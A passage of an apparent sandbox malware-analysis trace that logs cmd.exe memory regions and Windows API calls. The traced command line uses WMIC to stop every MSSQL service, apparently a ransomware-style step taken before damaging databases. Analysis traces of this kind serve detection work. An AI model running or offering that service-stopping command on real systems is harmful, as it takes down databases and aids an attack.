= "pagefile_0x00000000003b0000" filename = "" Region: id = 1503 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1504 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1505 start_va = 0x4410000 end_va = 0x4423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 1506 start_va = 0x4430000 end_va = 0x446ffff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 1507 start_va = 0x4470000 end_va = 0x456ffff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 1508 start_va = 0x4570000 end_va = 0x4570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004570000" filename = "" Region: id = 1509 start_va = 0x4580000 end_va = 0x4581fff entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 1510 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1511 start_va = 0x7ebc0000 end_va = 0x7ebe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebc0000" filename = "" Region: id = 1512 start_va = 0x7ebe6000 end_va = 0x7ebe6fff entry_point = 0x0 region_type = private name = "private_0x000000007ebe6000" filename = "" Region: id = 1513 start_va = 0x7ebec000 end_va = 0x7ebeefff entry_point = 0x0 region_type = private name = "private_0x000000007ebec000" filename = "" Region: id = 1514 start_va = 0x7ebef000 end_va = 0x7ebeffff entry_point = 0x0 region_type = private name = "private_0x000000007ebef000" filename = "" Region: id = 1515 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1516 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1517 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 1518 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1519 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 1520 start_va = 0x46e0000 end_va = 0x46effff entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 1521 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1522 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1523 start_va = 0x4590000 end_va = 0x468ffff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 1524 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1565 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1566 start_va = 0x4690000 end_va = 0x46cffff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 1567 start_va = 0x46f0000 end_va = 0x47adfff entry_point = 0x46f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1568 start_va = 0x47b0000 end_va = 0x48affff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 1569 start_va = 0x49e0000 end_va = 0x49effff entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 1570 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1571 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1572 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1573 start_va = 0x7eac0000 end_va = 0x7ebbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eac0000" filename = "" Region: id = 1574 start_va = 0x7ebe9000 end_va = 0x7ebebfff entry_point = 0x0 region_type = private name = "private_0x000000007ebe9000" filename = "" Region: id = 1575 start_va = 0x390000 end_va = 0x393fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1576 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1577 start_va = 0x49f0000 end_va = 0x4d26fff entry_point = 0x49f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 132 os_tid = 0xc30 [0103.321] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0103.321] __set_app_type (_Type=0x1) [0103.321] __p__fmode () returned 0x77ac4d6c [0103.321] __p__commode () returned 0x77ac5b1c [0103.321] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0103.321] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0103.321] GetCurrentThreadId () returned 0xc30 [0103.321] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc30) returned 0x84 [0103.321] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0103.322] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0103.322] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.327] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.327] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x456fcf0 | out: phkResult=0x456fcf0*=0x0) returned 0x2 [0103.327] VirtualQuery (in: lpAddress=0x456fcf7, lpBuffer=0x456fca8, dwLength=0x1c | out: lpBuffer=0x456fca8*(BaseAddress=0x456f000, AllocationBase=0x4470000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0103.327] VirtualQuery (in: lpAddress=0x4470000, lpBuffer=0x456fca8, dwLength=0x1c | out: lpBuffer=0x456fca8*(BaseAddress=0x4470000, AllocationBase=0x4470000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0103.327] VirtualQuery (in: lpAddress=0x4471000, lpBuffer=0x456fca8, dwLength=0x1c | out: lpBuffer=0x456fca8*(BaseAddress=0x4471000, AllocationBase=0x4470000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0103.327] VirtualQuery (in: lpAddress=0x4473000, lpBuffer=0x456fca8, dwLength=0x1c | out: lpBuffer=0x456fca8*(BaseAddress=0x4473000, AllocationBase=0x4470000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0103.327] VirtualQuery (in: lpAddress=0x4570000, lpBuffer=0x456fca8, dwLength=0x1c | out: lpBuffer=0x456fca8*(BaseAddress=0x4570000, AllocationBase=0x4570000, AllocationProtect=0x2, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0103.327] GetConsoleOutputCP () returned 0x1b5 [0103.328] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0103.328] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0103.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0103.328] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0103.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0103.328] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0103.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0103.328] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0103.328] _get_osfhandle (_FileHandle=0) returned 0x38 [0103.328] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0103.329] _get_osfhandle (_FileHandle=0) returned 0x38 [0103.329] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0103.329] GetEnvironmentStringsW () returned 0x4597dd0* [0103.329] FreeEnvironmentStringsA (penv="A") returned 1 [0103.329] GetEnvironmentStringsW () returned 0x4597dd0* [0103.329] FreeEnvironmentStringsA (penv="A") returned 1 [0103.329] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x456ec54 | out: phkResult=0x456ec54*=0x94) returned 0x0 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x0, lpData=0x456ec60*=0x20, lpcbData=0x456ec5c*=0x1000) returned 0x2 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x4, lpData=0x456ec60*=0x1, lpcbData=0x456ec5c*=0x4) returned 0x0 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x0, lpData=0x456ec60*=0x1, lpcbData=0x456ec5c*=0x1000) returned 0x2 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x4, lpData=0x456ec60*=0x0, lpcbData=0x456ec5c*=0x4) returned 0x0 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x4, lpData=0x456ec60*=0x40, lpcbData=0x456ec5c*=0x4) returned 0x0 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x4, lpData=0x456ec60*=0x40, lpcbData=0x456ec5c*=0x4) returned 0x0 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x0, lpData=0x456ec60*=0x40, lpcbData=0x456ec5c*=0x1000) returned 0x2 [0103.329] RegCloseKey (hKey=0x94) returned 0x0 [0103.329] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x456ec54 | out: phkResult=0x456ec54*=0x94) returned 0x0 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x0, lpData=0x456ec60*=0x40, lpcbData=0x456ec5c*=0x1000) returned 0x2 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x4, lpData=0x456ec60*=0x1, lpcbData=0x456ec5c*=0x4) returned 0x0 [0103.329] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x0, lpData=0x456ec60*=0x1, lpcbData=0x456ec5c*=0x1000) returned 0x2 [0103.330] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x4, lpData=0x456ec60*=0x0, lpcbData=0x456ec5c*=0x4) returned 0x0 [0103.330] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x4, lpData=0x456ec60*=0x9, lpcbData=0x456ec5c*=0x4) returned 0x0 [0103.330] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x4, lpData=0x456ec60*=0x9, lpcbData=0x456ec5c*=0x4) returned 0x0 [0103.330] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x456ec58, lpData=0x456ec60, lpcbData=0x456ec5c*=0x1000 | out: lpType=0x456ec58*=0x0, lpData=0x456ec60*=0x9, lpcbData=0x456ec5c*=0x1000) returned 0x2 [0103.330] RegCloseKey (hKey=0x94) returned 0x0 [0103.330] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29818 [0103.330] srand (_Seed=0x5ad29818) [0103.330] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE" [0103.330] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE" [0103.330] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0103.330] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4599d28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0103.330] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0103.330] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0103.330] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0103.331] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0103.331] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0103.331] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0103.331] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0103.331] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0103.331] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0103.331] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0103.331] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0103.331] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0103.331] GetEnvironmentStringsW () returned 0x4597dd0* [0103.331] FreeEnvironmentStringsA (penv="A") returned 1 [0103.331] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.331] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0103.331] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0103.331] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0103.331] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0103.331] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0103.331] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0103.331] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0103.331] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0103.331] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0103.332] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x456fa2c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0103.332] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x456fa2c, lpFilePart=0x456fa24 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x456fa24*="Desktop") returned 0x1d [0103.332] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0103.332] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x456f7a8 | out: lpFindFileData=0x456f7a8) returned 0x45905c8 [0103.332] FindClose (in: hFindFile=0x45905c8 | out: hFindFile=0x45905c8) returned 1 [0103.332] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x456f7a8 | out: lpFindFileData=0x456f7a8) returned 0x45905c8 [0103.332] FindClose (in: hFindFile=0x45905c8 | out: hFindFile=0x45905c8) returned 1 [0103.332] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0103.332] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x456f7a8 | out: lpFindFileData=0x456f7a8) returned 0x45905c8 [0103.332] FindClose (in: hFindFile=0x45905c8 | out: hFindFile=0x45905c8) returned 1 [0103.332] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0103.332] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0103.332] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0103.332] GetEnvironmentStringsW () returned 0x4597dd0* [0103.332] FreeEnvironmentStringsA (penv="=") returned 1 [0103.332] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0103.333] GetConsoleOutputCP () returned 0x1b5 [0103.333] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0103.333] GetUserDefaultLCID () returned 0x409 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x456fb5c, cchData=128 | out: lpLCData="0") returned 2 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x456fb5c, cchData=128 | out: lpLCData="0") returned 2 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x456fb5c, cchData=128 | out: lpLCData="1") returned 2 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0103.333] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0103.333] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0103.334] GetConsoleTitleW (in: lpConsoleTitle=0x459aa98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.334] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0103.334] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0103.334] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0103.335] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0103.335] GetEnvironmentVariableW (in: lpName="MSSQL", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0103.335] _wcsicmp (_String1="MSSQL", _String2="CD") returned 10 [0103.335] _wcsicmp (_String1="MSSQL", _String2="ERRORLEVEL") returned 8 [0103.335] _wcsicmp (_String1="MSSQL", _String2="CMDEXTVERSION") returned 10 [0103.335] _wcsicmp (_String1="MSSQL", _String2="CMDCMDLINE") returned 10 [0103.335] _wcsicmp (_String1="MSSQL", _String2="DATE") returned 9 [0103.335] _wcsicmp (_String1="MSSQL", _String2="TIME") returned -7 [0103.335] _wcsicmp (_String1="MSSQL", _String2="RANDOM") returned -5 [0103.335] _wcsicmp (_String1="MSSQL", _String2="HIGHESTNUMANODENUMBER") returned 5 [0103.335] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0103.335] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0103.335] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0103.335] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0103.335] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0103.335] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0103.335] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0103.337] GetConsoleTitleW (in: lpConsoleTitle=0x456f848, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.337] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0103.337] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0103.337] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0103.337] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0103.337] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0103.337] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0103.337] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0103.337] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0103.337] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0103.337] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0103.337] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0103.337] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0103.337] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0103.337] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0103.337] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0103.337] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0103.337] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0103.337] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0103.337] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0103.337] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0103.337] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0103.337] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0103.337] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0103.337] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0103.337] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0103.337] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0103.337] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0103.337] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0103.337] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0103.337] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0103.337] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0103.337] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0103.337] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0103.337] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0103.337] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0103.337] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0103.337] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0103.338] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0103.338] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0103.338] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0103.338] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0103.338] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0103.338] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0103.338] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0103.338] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0103.338] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0103.338] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0103.338] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0103.338] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0103.338] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0103.338] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0103.338] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0103.338] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0103.338] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0103.338] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0103.338] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0103.338] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0103.338] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0103.338] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0103.338] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0103.338] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0103.338] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0103.338] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0103.338] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0103.338] _wcsicmp 